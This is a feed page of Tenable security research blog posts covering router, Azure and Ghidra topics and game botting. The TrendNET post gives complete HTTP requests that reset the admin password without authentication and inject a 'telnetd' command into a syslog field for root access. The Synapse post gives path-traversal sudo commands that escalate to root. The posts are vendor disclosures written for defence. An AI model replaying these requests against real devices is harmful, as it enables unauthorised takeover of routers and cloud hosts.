Normal view

There are new articles available, click to refresh the page.
Before yesterdayTenable TechBlog - Medium

NETGEAR Router Network Misconfiguration

5 December 2022 at 17:16

Last Minute Patch Thwarts Pwn2Own Entries

Entering Pwn2Own is a daunting endeavor. The targets selected are often popular, already picked over devices with their inclusion in the event only increasing the amount of security researcher eyes pouring over them. Not only that, but it’s not uncommon for vendors to release last minute patches for the included targets in an effort to thwart researcher findings. This year alone we see that both TP-Link and NETGEAR have released last minute updates to devices included in the event.

Last Minute TP-Link Patch

Unfortunately, we fell victim to this with regards to a planned submission for the NETGEAR Nighthawk WiFi6 Router (RAX30 AX2400). The patch released by NETGEAR the day before the registration deadline dealt a deathblow to our exploit chain and unfortunately invalidated our submission. A few posts on Twitter and communications with other parties appear to indicate that other contestants were also affected by this last minute patch.

That said, since the patch is publicly available, let’s talk about what changed!

While we aren’t aware of everything patched or changed in this update, we do know which flaw prevented our full exploit chain from working properly. Basically, a network misconfiguration present in versions prior to V1.0.9.90 of the firmware inadvertently allowed unrestricted communication with any services listening via IPv6 on the WAN (internet facing) port of the device. For example, SSH and Telnet are operating on ports 22 and 23 respectively.

The SMD service hosting SSH and Telnet variants on IPv6

Prior to the patch, an attacker could interact with these services from the WAN port. After patching, however, we can see that the appropriate ip6tables rules have been applied to prevent access. Additionally, IPv6 now appears disabled by default on newly configured devices.

We’d also like to point out that — at the time of this writing — the device’s auto-update feature does not appear to recognize that updates are available beyond V1.0.6.74. Any consumers relying on the auto-update or “Check for Updates” mechanisms of these devices are likely to remain vulnerable to this issue and any other issues teased over the coming days of Pwn2Own Toronto 2022.

More details can be found on our security advisory page here. We’ll have more information regarding other discovered issues once the coordinated disclosure process for them has been concluded.


NETGEAR Router Network Misconfiguration was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Extracting Ghidra Decompiler Output with Python

28 July 2022 at 13:03

Ghidra’s decompiler, while not perfect, is pretty darn handy. Ghidra’s user interface, however, leaves a lot to be desired. I often find myself wishing there was a way to extract all the decompiler output to be able to explore it a bit easier in a text editor or at least run other tools against it.

At the time of this writing, there is no built-in functionality to export decompiler output from Ghidra. There are a handful of community made scripts available that get the job done (such as Haruspex and ExportToX64dbg), but none of these tools are as flexible as I’d like. For one, Ghidra’s scripting interface is not the easiest to work with. And two, resorting to Java or the limitations of Jython just doesn’t cut it. Essentially, I want to be able to access Ghidra’s scripting engine and API while retaining the power and flexibility of a local, fully-featured Python3 environment.

This blog will walk you through setting up a Ghidra to Python bridge and running an example script to export Ghidra’s decompiler output.

Prepping Ghidra

First and foremost, make sure you have a working installation of Ghidra on your system. Official downloads can be obtained from https://ghidra-sre.org/.

Next, you’ll want to download and install the Ghidra to Python Bridge. Steps for setting up the bridge are demonstrated below, but it is recommended to follow the official installation guide in the event that the Ghidra Bridge project changes over time and breaks these instructions.

The Ghidra to Python bridge is a local Python RPC proxy that allows you to access Ghidra objects from outside the application. A word of caution here: Using this bridge is essentially allowing arbitrary code execution on your machine. Be sure to shutdown the bridge when not in use.

In your preferred python environment, install the ghidra bridge:

$ pip install ghidra_bridge

Create a directory on your system to store Ghidra scripts in. In this example, we’ll create and use “~/ghidra_scripts.”

$ mkdir ~/ghidra_scripts

Launch Ghidra and create a new project. Create a Code Browser window (click the dragon icon in the tool chest bar) and open the Script Manager window. This can be opened by selecting “Window > Script Manager.” Press the “Manage Script Directories” in the Script Manager’s toolbar.

In the window that pops up, add and enable “$USER_HOME/ghidra_scripts” to the list of script directories.

Back in your terminal or python environment, run the Ghidra Bridge installation process.

$ python -m ghidra_bridge.install_server ~/ghidra_scripts

This will automatically copy over the scripts necessary for your system to run the Ghidra Bridge.

Finally, back in Ghidra, click the “Refresh Script List” button in the toolbar and filter the results to “bridge.”. Check the boxes next to “In Toolbar” for the Server Start and Server Shutdown scripts as pictured below. This will allow you to access the bridge’s start/stop commands from the Tools menu item.

Go ahead and start the bridge by selecting “Run in Background.” If all goes according to plan, you should see monitor output in the console window at the bottom of the window similar to the following:

Using the Ghidra Bridge

Now that you’ve got the full power and flexibility of Python, let’s put it to some good use. As mentioned earlier, the example use-case being provided in this blog is the export of Ghidra’s decompiler output.

Source code for this example is available here: https://github.com/tenable/ghidra_tools/tree/main/extract_decomps

We’ll be using an extremely simple application to demonstrate this script’s functionality, which is available in the “example” folder of the “extract_decomps” directory. All the application does is grab some input from the user and say hello.

Build and run the test application.

$ gcc test.c
$ ./a.out
What is your name?
# dino
Hello, dino!

Import the test binary into Ghidra and run an auto-analysis on it. Once complete, simply run the extraction script.

$ python extract.py
INFO:root:Program Name: a.out
INFO:root:Creation Date: Tue Jul 26 13:51:21 EDT 2022
INFO:root:Language ID: AARCH64:LE:64:AppleSilicon
INFO:root:Compiler Spec ID: default
INFO:root:Using 'a.out_extraction' as output directory…
INFO:root:Extracting decompiled functions…
INFO:root:Extracted 7 out of 7 functions
$ tree a.out_extraction
a.out_extraction
├── [email protected]
├── [email protected]
├── [email protected]
├── [email protected]
├── [email protected]
├── [email protected]
└── [email protected]

From here, you’re free to browse the source code in the text editor or IDE of your choice and run any other tools you see fit against this output. Please keep in mind, however, that the decompiler output from Ghidra is intended as pseudo code and won’t necessarily conform to the syntax expected by many static analysis tools.


Extracting Ghidra Decompiler Output with Python was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Logging Passwords in Plaintext in Azure Arc

19 July 2022 at 13:03

Microsoft’s Azure Arc is a management platform designed to bridge multi-cloud and similarly mixed environments together in a convenient way.

Tenable Research has discovered that the Jumpstart environments for Arc do not properly use logging utilities common amongst other Azure services. This leads to potentially sensitive information, such as service principal credentials and Arc database credentials, being logged in plaintext. The log files that these credentials are stored in are accessible by any user on the system. Based on this finding, it may be possible that other services are also affected by a similar issue.

Microsoft has patched this issue and updated their documentation to warn users of credential reuse within the Jumpstart environment. Tenable’s advisory can be found here. No bounty was provided for this finding.

The Flaw

The testing environment this issue was discovered in is the ArcBox Fullbox Jumpstart environment. No additional configurations are necessary beyond the defaults.

When ArcBox-Client provisions during first-boot, it runs a PowerShell script that is sent to it via the `Microsoft.Compute.CustomScriptExtension (version 1.10.12) plugin.

Most scripts we’ve come across on other services tend to write ***REDACTED*** in place of anything sensitive when writing to a log file. For example:

<PluginSettings>
<Plugin name="Microsoft.CPlat.Core.RunCommandLinux" version="1.0.3">
<RuntimeSettings seqNo="0">{
"runtimeSettings": [
{
"handlerSettings": {
"protectedSettingsCertThumbprint": "7AF139E055555FAKEINFO555558EC374DAD46370",
"protectedSettings": "*** REDACTED ***",
"publicSettings": {}
}
}
]
}</RuntimeSettings>

In the provisioning script for this host, however, this sanitizing is not done. For example, in “C:\Packages\Plugins\Microsoft.Compute.CustomScriptExtension\1.10.12\Status\0.status”, our secrets and credentials are plainly visible to everyone, including low privileged users.

This allows a malicious actor to disclose potentially sensitive information if they were to gain access to this machine. The accounts revealed could allow the attacker to further compromise a customer’s Azure environment if these credentials or accounts are re-used elsewhere.

Conclusion

Obviously, the Arc Jumpstart environment is intended to be used as a demo environment, which ideally lessens the impact of the revealed credentials — provided that users haven’t reused the service principal elsewhere in their environment. That said, it isn’t uncommon for customers to use these types of Jumpstart environments as a starting point to build out their actual production infrastructure.

We do, however, feel it’s worth being aware of this issue in the event that other logging mechanisms exist elsewhere in the Azure ecosystem, which could have more dire consequences if present in a production environment.


Logging Passwords in Plaintext in Azure Arc was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Microsoft Azure Site Recovery DLL Hijacking

12 July 2022 at 16:58

Azure Site Recovery is a suite of tools aimed at providing disaster recovery services for cloud resources. It provides utilities for replication, data recovery, and failover services during outages.

Tenable Research has discovered that this service is vulnerable to a DLL hijacking attack due to incorrect directory permissions. This allows any low-privileged user to escalate to SYSTEM level privileges on hosts where this service is installed.

Microsoft has assigned this issue CVE-2022–33675 and rated it a severity of Important with a CVSSv3 score 7.8. Tenable’s advisory can be found here. Microsoft’s post regarding this issue can be found here. Additionally, Microsoft is expected to award a $10,000 bug bounty for this finding.

The Flaw

The cxprocessserver service runs automatically and with SYSTEM level privileges. This is the primary service for Azure Site Recovery.

Incorrect permissions on the service’s executable directory (“E:\Program Files (x86)\Microsoft Azure Site Recovery\home\svsystems\transport\”) allow new files to be created by normal users. Please note that while the basic permissions show that “write” access is disabled, the “Special Permissions” still incorrectly grant write access to this directory. This can be verified by viewing the “Effective Access” granted to a given user for the directory in question, as demonstrated in the following screenshot.

This permissions snafu allows for a DLL hijacking/planting attack via several libraries used by the service binary.

Proof of Concept

For brevity, we’ve chosen to leave full exploitation steps out of this post since DLL hijacking techniques are extremely well documented elsewhere.

A malicious DLL was created to demonstrate the successful hijack via procmon.

Under normal circumstances, the loading of ktmw32.dll looks like the following:

With our planted DLL, the following can be observed:

This allows an attacker to elevate from an arbitrary, low-privileged user to SYSTEM. During the disclosure process, Microsoft confirmed this behavior and has created patches accordingly.

Conclusion

DLL hijacking is quite an antiquated technique that we don’t often come across these days. When we do, impact is often quite limited due to lack of security boundaries being crossed. MSRC lists several examples in their blog post discussing how they triage issues that make use of this technique.

In this case, however, we were able to cross a clear security boundary and demonstrated the ability to escalate a user to SYSTEM level permissions, which shows the growing trend of even dated techniques finding a new home in the cloud space due to added complexities in these sorts of environments.

As this vulnerability was discovered in an application used for disaster recovery, we are reminded that had this been discovered by malicious actors, most notably ransomware groups, the impact could have been much wider reaching. Ransomware groups have been known to target backup files and servers to ensure that a victim is forced into paying their ransom and unable to restore from clean backups. We strongly recommend applying the Microsoft supplied patches as soon as possible to ensure your existing deployments are properly secured. Microsoft has taken action to correct this issue, so any new deployments should not be affected by this flaw.


Microsoft Azure Site Recovery DLL Hijacking was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Microsoft Azure Synapse Pwnalytics

13 June 2022 at 12:42

Synapse Analytics is a platform used for machine learning, data aggregation, and other such computational work. One of the primary developer-oriented features of this platform is the use of Jupyter notebooks. These are essentially blocks of code that can be run independently of one another in order to analyze different subsets of data.

Synapse Analytics is currently listed under Microsoft’s high-impact scenarios in the Azure Bug Bounty program. Microsoft states that products and scenarios listed under that heading have the highest potential impact to customer security.

Synapse Analytics utilizes Apache Spark for the underlying provisioning of clusters that user code is run on. User code in these environments is run with intentionally limited privileges because the environments are managed by internal Microsoft subscription IDs, which is generally indicative of a multi-tenant environment.

Tenable Research has discovered a privilege escalation flaw that allows a user to escalate privileges to that of the root user within the context of a Spark VM. We have also discovered a flaw that allows a user to poison the hosts file on all nodes in their Spark pool, which allows one to redirect subsets of traffic and snoop on services users generally do not have access to. The full privilege escalation flaw has been adequately addressed. However, the hosts file poisoning flaw remains unpatched at the time of this writing.

Many of the keys, secrets, and services accessible via these attacks have traditionally allowed further lateral movement and potential compromise of Microsoft-owned infrastructure, which could lead to a compromise of other customers’ data as we’ve seen in several other cases recently, such as Wiz’s ChaosDB or Orca’s AutoWarp. For Synapse Analytics, however, access by a root user is limited to their own Spark pool. Access to resources outside of this pool would require additional vulnerabilities to be chained and exploited. While Tenable remains skeptical that cross-tenant access is not possible with the elevated level of access gained by exploitation of these flaws, the Synapse engineering team has assured us that such a feat is not possible.

Tenable has rated this issue as Critical severity based on the context of the Spark VM itself. Microsoft considers this issue a Low severity defense-in-depth improvement based on the context of the Synapse Analytics environment as a whole. Microsoft states that cross-tenant impact of this issue is unlikely, if not impossible, based on this vulnerability alone.

We’ll get to the technical bits soon, but let’s first address some disclosure woes. When it comes to Synapse Analytics, Microsoft Security Response Center (MSRC) and the development team behind Synapse seem to have a major communications disconnect. It took entirely too much effort to get any sort of meaningful response from our case agent. Despite numerous attempts at requesting status updates via emails and the researcher portal, it wasn’t until we reached out via Twitter that we would receive responses. During the disclosure process, Microsoft representatives initially seemed to agree that these were critical issues. A patch for the privilege escalation issue was developed and implemented without further information or clarification being required from Tenable Research. This patch was also made silently and no notification was provided to Tenable. We had to discover this information for ourselves.

During the final weeks of the disclosure process, MSRC began attempting to downplay this issue and classified it as a “best practice recommendation” rather than a security issue. Their team stated the following (typos are Microsoft’s): “[W]e do not consider this to be a important severity security issue but rather a better practice.” If that were the case, why can snippets like the following be found throughout the Spark VMs?

It wasn’t until we notified MSRC of the intent to publish our findings that they acknowledged these issues as security-related. At the eleventh hour of the disclosure timeline, someone from MSRC was able to reach out and began rectifying the communication mishaps that had been occuring.

Unfortunately, communication errors and the downplaying of security issues in their products and cloud offerings is far from uncommon behavior for MSRC as of late. For a few more recent examples where MSRC has failed to adequately triage findings and has acted in bad faith towards researchers, check out the following research articles:

The Flaws

Privilege Escalation

The Jupyter notebook functionality of Synapse runs as a user called “trusted-service-user” within an Apache Spark cluster. These compute resources are provisioned to a specific Azure tenant, but are managed internally by Microsoft. This can be verified by viewing the subscription ID of the nodes on the cluster (only visible with elevated privileges and the Azure metadata service). This is indicative of a multi-tenant environment.

Not our subscription ID

This “trusted-service-user” has limited access to many of the resources on the host and is intentionally unable to interact with “waagent,” the Azure metadata service, the Azure WireServer service, and many other services only intended to be accessed by the root user and other special accounts end-users do not normally have access to.

That said, the trusted-service-user does have sudo access to a utility that is used to mount file shares from other Azure services:

The above screenshot shows that the Jupyter notebook code is running as the “trusted-service-user” account and that it has sudo access to run a particular script without requiring a password.

The filesharemount.sh script happens to contain a handful of flaws that, when combined, can be used to escalate privileges to root. The full text has been omitted from this section for brevity, but relevant bits are highlighted below.

#!/bin/bash
#
# NodeAgent installation script.
#
# Maintained by [email protected].
# Copyright © Microsoft Corporation. All rights reserved.
#
# this script use cifs to mount fileshare, will be deprecated once we implement fuse driver to mount fileshare
SCRIPT_DIR=”$( cd “$( dirname “${BASH_SOURCE[0]}” )” >/dev/null 2>&1 && pwd )”
source ${SCRIPT_DIR}/functions.sh
...

First and foremost, this script is clearly temporary and has likely not undergone strict review as indicated by the deprecation warning. Additionally, it appears that several functions are sourced from a “functions.sh” file in the same directory.

The functions provided by “functions.sh” are used for sanity checks throughout the main script. For example, the following is used to determine if a given mount point is valid before attempting to unmount it:

...
if [ “$commandtype” = “unmount” ]; then
check_if_is_valid_mount_point_before_unmount $args
umount $args
rm -rf $args
exit 0
fi
...

Moving on, the end of the main script is where we find the good stuff:

...
chown -R ${TRUSTED_SERVICE_USER}:${TRUSTED_SERVICE_USER} “$mountPoint”
uid=$(id -u ${TRUSTED_SERVICE_USER})
gid=$(id -g ${TRUSTED_SERVICE_USER})
mount -t cifs //”$account”.file.core.windows.net/”$fileshare” “$mountPoint” -o vers=3.0,uid=$uid,gid=$gid,username=”$account”,password=”$accountKey”,serverino
if [ “$?” -ne “0” ]; then
check_if_deletable_folder “$mountPoint”
rm -rf “$mountPoint”
exit 1
fi

Another of the check functions from functions.sh is used above, but this time the check is keyed off successfully running the mount command a few lines earlier. If the mount command fails, the mount point is deleted. By providing a mount point that passes all sanity checks to this point and that has invalid file share credentials, we can trigger the “rm” command in the above snippet. Let’s use it to get rid of the functions.sh file, and thus, all of the sanity check functions.

Full command used for file deletion:

sudo -u root /usr/lib/notebookutils/bin/filesharemount.sh mount mountPoint:/synfs/../../../usr/lib/notebookutils/bin/functions.sh source:https://[email protected] accountKey:invalid 2>&1

The functions.sh file only checks that the mountPoint begins with “/synfs” before determining that it is valid. This allows a simple directory traversal attack to bypass that function.

Now we can bypass all checks from functions.sh, remove the existing filesharemount.sh utility, and mount our own in the same directory, which still has sudo access. We created a test share using the Gen2 Storage service within Azure. We created a file in this share called “filesharemount.sh” with the contents being “id”. This allows us to demonstrate the execution privileges now granted to us.

Our mount command looks like this:

sudo -u root /usr/lib/notebookutils/bin/filesharemount.sh mount mountPoint:/synfs/../../../usr/lib/notebookutils/bin/ source:https://[email protected] accountKey:REDACTED 2>&1

Let’s check our access now:

Hosts File Poisoning

There exists a service on one of the hosts in each Spark pool called “HostResolver.” To be specific, it can be found at “/opt/microsoft/Microsoft.Analytics.Clusters.Services.HostResolver.dll” on each of the nodes in the Synapse environment. This service is used to manage the “hosts” file for all hosts in the Spark cluster. This supports ease-of-management — administrators can send commands to each host by a preset hostname, rather than keeping track of IP addresses, which can change based on the scaling features of the pool.

Due to the lack of any authentication features, a low-privileged user is able to overwrite the “hosts” file on all nodes in their Spark pool, which allows them to snoop on services and traffic they otherwise are not intended to be able to see. To be clear, this isn’t any sort of game-changing vulnerability or of any real significance on its own. We do believe, however, that this flaw warrants a patch due to its potential as a critical piece of a greater exploit chain. It’s also just kinda fun and interesting.

For example, here’s a view of the information used by each host:

Output:

The hostresolver can be queried like this:

What happens when a new host is added to the pool? Well, a register request is sent to the hostresolver, which parses the request, and then sends out an update to all other hosts in the pool to update their hosts file. If the entry already exists, it is overwritten.

This register request looks like this:

The updated hosts file looks like this:

This change is propagated to all hosts in the pool. As there is no authentication to this service, we can arbitrarily modify the hosts file on all nodes by manually submitting register requests. If these hosts were provisioned under our subscription ID in Azure, this wouldn’t be an issue since we’d already have full control of them. Since we don’t actually own these hosts, however, this is a slightly bigger problem.

When we originally reported this issue, communicating to hosts outside of one’s own Spark pool was possible. We assume that was a separate issue as it was fixed during the course of our own research and not publicly disclosed by Microsoft. This new inability to communicate outside of our own pool severely limits the impact of this flaw by itself, now requiring other flaws in order to achieve greater impact. At the time of this writing, the hosts file poisoning flaw remains unpatched.

Key Takeaways

Patching in cloud environments is largely out of end-users’ control. Customers are entirely beholden to the cloud providers to fix reported issues. The good news is that once an issue is fixed, it’s fixed. Customers generally don’t have any actions to take since everything happens behind the scenes.

The bad news, however, is that the cloud providers rarely provide notice that a security-related flaw was ever present in the first place. Cloud vulnerabilities rarely receive CVEs because they aren’t static products. They are ever-changing beasts with no accountability requirements in terms of notifying users and customers of security-related changes.

It doesn’t matter how good any given vendor’s software supply chain is if there are parts of the process or product that don’t rely on it. For example, the filesharemount.sh script (and other scripts discovered on these hosts) have very clear deprecation warnings in them and don’t appear to be required to go through the normal QA channels. Chances are this was a temporary script to enable necessary functionality with the intention of replacing it sometime down the line, but that sometime never arrived and it became a fairly critical component, which is a situation any software engineer is all too familiar with.

Additionally, because these environments are so volatile, it makes it difficult for security researchers to accurately gauge the impact of their findings because of strict Rules of Engagement and changes happening over the course of one’s research.

For example, in the hosts file poisoning vulnerability discussed in this blog, we noticed that we were able to change the hosts files in pools outside of our own, but this was fixed at some point during the disclosure process by introducing more robust firewalling rules at the node-level. We also noticed many changes happening with certain features of the service throughout our research, which we now know was the doing of the good folks at Orca Security during their SynLapse research.

On a final note, while we respect the efforts of researchers that go the extra mile to compromise customer data and internal vendor secrets, we believe it’s in everyone’s best interest to adhere to the rules set forth by each of the cloud vendors. Since there are so many moving pieces in these environments and likely many configurations outsiders are not privy to, violating these rules of engagement could have unintended consequences we’d rather not be responsible for. This does, however, introduce a sort of Catch-22 for researchers where the vendor can claim that a disclosure report does not adequately demonstrate impact, but also claim that a researcher has violated the rules of engagement if they do take the extra steps to do so.

For more information regarding these issues and their disclosure timelines, please see the following Tenable Research Advisories:


Microsoft Azure Synapse Pwnalytics was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

TrendNET AC2600 RCE via WAN

31 January 2022 at 14:03

This blog provides a walkthrough of how to gain RCE on the TrendNET AC2600 (model TEW-827DRU specifically) consumer router via the WAN interface. There is currently no publicly available patch for these issues; therefore only a subset of issues disclosed in TRA-2021–54 will be discussed in this post. For more details regarding other security-related issues in this device, please refer to the Tenable Research Advisory.

In order to achieve arbitrary execution on the device, three flaws need to be chained together: a firewall misconfiguration, a hidden administrative command, and a command injection vulnerability.

The first step in this chain involves finding one of the devices on the internet. Many remote router attacks require some sort of management interface to be manually enabled by the administrator of the device. Fortunately for us, this device has no such requirement. All of its services are exposed via the WAN interface by default. Unfortunately for us, however, they’re exposed only via IPv6. Due to an oversight in the default firewall rules for the device, there are no restrictions made to IPv6, which is enabled by default.

Once a device has been located, the next step is to gain administrative access. This involves compromising the admin account by utilizing a hidden administrative command, which is available without authentication. The “apply_sec.cgi” endpoint contains a hidden action called “tools_admin_elecom.” This action contains a variety of methods for managing the device. Using this hidden functionality, we are able to change the password of the admin account to something of our own choosing. The following request demonstrates changing the admin password to “testing123”:

POST /apply_sec.cgi HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 145
Origin: http://192.168.10.1
Connection: close
Referer: http://192.168.10.1/setup_wizard.asp
Cookie: compact_display_state=false
Upgrade-Insecure-Requests: 1
ccp_act=set&action=tools_admin_elecom&html_response_page=dummy_value&html_response_return_page=dummy_value&method=tools&admin_password=testing123

The third and final flaw we need to abuse is a command injection vulnerability in the syslog functionality of the device. If properly configured, which it is by default, syslogd spawns during boot. If a malformed parameter is supplied in the config file and the device is rebooted, syslogd will fail to start.

When visiting the syslog configuration page (adm_syslog.asp), the backend checks to see if syslogd is running. If not, an attempt is made to start it, which is done by a system() call that accepts user controllable input. This system() call runs input from the cameo.cameo.syslog_server parameter. We need to somehow stop the service, supply a command to be injected, and restart the service.

The exploit chain for this vulnerability is as follows:

  1. Send a request to corrupt syslog command file and change the cameo.cameo.syslog_server parameter to contain an injected command
  2. Reboot the device to stop the service (possible via the web interface or through a manual request)
  3. Visit the syslog config page to trigger system() call

The following request will both corrupt the configuration file and supply the necessary syslog_server parameter for injection. Telnetd was chosen as the command to inject.

POST /apply.cgi HTTP/1.1
Host: [REDACTED]
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 363
Origin: http://192.168.10.1
Connection: close
Referer: http://192.168.10.1/adm_syslog.asp
Cookie: compact_display_state=false
ccp_act=set&html_response_return_page=adm_syslog.asp&action=tools_syslog&reboot_type=application&cameo.cameo.syslog_server=1%2F192.168.1.1:1234%3btelnetd%3b&cameo.log.enable=1&cameo.log.server=break_config&cameo.log.log_system_activity=1&cameo.log.log_attacks=1&cameo.log.log_notice=1&cameo.log.log_debug_information=1&1629923014463=1629923014463

Once we reboot the device and re-visit the syslog configuration page, we’ll be able to telnet into the device as root.

Since IPv6 raises the barrier of entry in discovering these devices, we don’t expect widespread exploitation. That said, it’s a pretty simple exploit chain that can be fully automated. Hopefully the vendor releases patches publicly soon.


TrendNET AC2600 RCE via WAN was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

New World’s Botting Problem

11 November 2021 at 14:02
Source: https://pbs.twimg.com/profile_images/1392124727976546307/vBwCWL8W_400x400.jpg

New World, Amazon’s latest entry into the gaming world, is a massive multiplayer online game with a sizable player base. For those unfamiliar, think something in the vein of World of Warcraft or Runescape. After many delays and an arguably bumpy launch… well, we’ve got a nice glimpse at some surprising (and other not-so-surprising) bugs in recent weeks. These bugs include HTML injection in chat messages, gold dupes, invincible players, overpowered weapon glitches, etc. That said, this isn’t anything new for MMOs and is almost expected to occur to some extent. I don’t really care to talk much about any of those bugs, though, and would instead prefer to talk about something far more common to the MMO scene and something very unlikely to be resolved by patches or policies anytime soon (if ever): bots.

Since launch, there has been no shortage of players complaining about suspected bots, Reddit posts capturing people in the act, and gaming media discussing it ad nauseam. As with any and all MMOs before it, fighting the botting problem is going to be a never-ending battle for the developers. That said, what’s the point in running a bot for a game like this? And how do they work? That’s what we intend to cover in this post.

The Botting Economy

So why bot? Well, in my opinion, there are three categories people fall in when it comes to the reason for their botting:

  • Actual cheaters trying to take shortcuts and get ahead
  • People automating tasks they find boring, but who otherwise enjoy playing the rest of the game legitimately (this can technically be lumped into the above group)
  • Gold farmers trying to turn in-game resources into real-world currency

Each of the above reasons provides enough of a foundation and demand for botting and cheating services that there are entire online communities and marketplaces dedicated to providing these services in exchange for real-world money. For example, sites like OwnedCore.com exist purely for users to advertise and sell their services. The infamous WoW Glider sold enough copies and turned enough profit that it caused Blizzard Entertainment to sue the creator of the botting software. And entire marketplaces for the sale of gold and other in-game items can be found on sites like g2g.com.

This niche market isn’t reserved just for hobbyists either. There are entire companies and professional toolkits dedicated to this stuff. We’ve all heard of Chinese gold farming outlets, but the botting and cheating market extends well beyond that. For example, sites like IWANTCHEATS.NET, SystemCheats, and dozens of others exist just to sell tools geared towards specific games.

Many of the dedicated toolkits also market themselves as being user-customizable. These tools allow users to build their own cheats and bots with a more user-friendly interface. For example, Chimpeon is marketed as a full game automation solution. It operates as an auto clicker and “pixel detector,” similar to how open-source toolkits like pyAutoGUI work, which is the mechanic we’ll be exploring for the remainder of this post.

How do these things work?

Gaming bots, as with everything, come in all shapes and sizes with varying levels of sophistication. In the most complex scenarios, developers will reverse engineer the game and hook into functionality that allows them to interact with game components directly and access information that players don’t have access to under normal circumstances. This information could include things like being able to see what’s on the other side of a wall, when the next resource is going to spawn, or what fish/item is going to get hooked at the end of their fishing rod.

To bring the discussion back to New World, let’s talk about fishing. Fishing is a mechanic in the game that allows players to, you guessed it, fish. It’s a simple mechanic where the character in the game casts their fishing rod, waits for a bit, and then plays a little mini-game to determine if they caught the fish or not. This mini-game comes in the form of a visual prompt on the screen with an icon that changes colors. If it’s green, you press the mouse button to begin reeling in the fish. If it turns orange, back off a bit. If it turns red and stays red for too long, the fish will get away and the player will have to try again. Fishing provides a way for players to gain experience and level up their characters, retrieve resources to level up other skills (such as cooking or alchemy), or obtain rare items that can be sold to other players for a profit. As with any and all MMOs before it to feature this mechanic, New World is plagued with a billion different botting services that claim to automate this component of the game for players.

For the most sophisticated of these bots, there are ways to peek at the game’s memory to determine if the fish being caught is worth playing the minigame for or not. If it is, the bot will play the minigame for the player. If it is not, the bot will simply release the fish immediately without wasting the time playing the game for a low-quality reward. While I won’t be discussing it in this post, many others have taken the liberty of publishing their research into New World’s internals on popular cheating forums like UnknownCheats.me.

Running bots and tools that interact with the game in this manner is quite a risky endeavor due to how aggressive anti-cheat engines are these days, namely EasyAntiCheat — the engine used by New World and many other popular games. If the anti-cheat detects a known botting program running or sees game memory being inspected in ways that are not expected, it could lead to a player having their account permanently banned.

So what’s a safer option? What about all of these “undetectable” bots being advertised? They all claim to “not interact with the game’s process memory.” What’s that all about? Well, first off, that “undetectable” bit is a lie. Second, these bots are all very likely auto clickers and pixel detectors. This means they monitor specific portions of the game screen and wait for certain images or colors to appear, and then they perform a set of pre-determined actions accordingly.

The anti-cheat, however, can still detect if tools are monitoring the game’s screen or taking automated actions. It’s not normal for a person to sit at their computer for 100 hours straight making the exact same mouse movements over and over. Obviously, anti-cheat developers could add mitigations here, but it’s really a neverending game of cat and mouse. That said, there are plenty of legitimate tools out there that do make this a much safer option, such as running their screen watchers on a totally different computer. Windows Remote Desktop, Team Viewer, or some sort of VNC are perfectly normal tools one would run to check in on their computer remotely. What’s not to say they couldn’t monitor the screen this way? Well, nothing. And that’s exactly what many of the popular services, such as Chimpeon linked earlier, actually recommend. Again, running a bot with this method could still be detected, but it takes much more effort and is more prone to false positives, which may be against the interest of the game studio if they were to falsely ban legitimate players.

For example, a New World fishing bot only needs to monitor the area of the screen used for the minigame. If the right icons and colors are detected, reel the fish in. If the bad colors are detected, pause for a moment. This doesn’t have the advantage of being able to only catch good fish, but it’s much better than running a tool that’s highly likely to be detected by the anti-cheat at some point.

Let’s see one of these in action:

In the video above, we can see exactly how this bot operates. Basically, the user configures the game so that the colors and images appear as the botting software expects, and then chooses a region of the game to interact with. From there, the bot does all the work of playing the fishing minigame automatically.

While I won’t be posting a direct tutorial on how to build your own bot, I’d like to demonstrate the basic building blocks required to create one. That said, there are plenty of code samples available online already, which incidentally, are noted to have been detected by the anti-cheat and gotten players banned already.

Let’s Build One

As already mentioned, this will not be a fully functional bot, but it will demonstrate the basic building blocks. This demo will be done on a macOS host using Python.

So what’re the components we’ll need:

  • A way to capture a portion of the screen
  • A way to detect a specific pattern in the screen capture
  • A way to send mouse/keyboard inputs

Let’s get to it.

First, let’s create a loop to continuously capture a portion of the screen.

import mss
while True:
# 500x500 pixel region
region=(500, 500, 1000, 1000)
with mss.mss() as screen:
img = screen.grab(region)
mss.tools.to_png(img.rgb, img.size, output="sample.png")

Next, we’ll want a way to detect a given image within our image. For this demo, I’ve chosen to use the Tenable logo. We’ll use the OpenCV library for detection.

import cv2
import mss
from numpy import array
to_detect = cv2.imread("./tenable.jpg", cv2.IMREAD_UNCHANGED)
while True:
# 500x500 pixel region
region=(500, 500, 1000, 1000)
    # Grab region
with mss.mss() as screen:
img = screen.grab(region)
mss.tools.to_png(img.rgb, img.size, output="sample.png")
    # Convert image to format usable by cv2
img_cv = cv2.cvtColor(array(img), cv2.COLOR_RGB2BGR)
    # Check if the tenable logo is present
result = cv2.matchTemplate(img_cv, to_detect, eval('cv2.TM_CCOEFF_NORMED'))
if((result >= 0.6).any()):
print('DETECTED')
break

Running the above and dragging a logo template into the region of the screen this is on will trigger the “DETECTED” message. To note, this code snippet may not work exactly as written depending on your monitor setup and configured resolution. There might be settings that need to be tweaked in some scenarios.

That’s it. No seriously, that’s it. The only thing left is to add mouse and keyboard actions, which is easy enough with a library like pynput.

What’s being done about it?

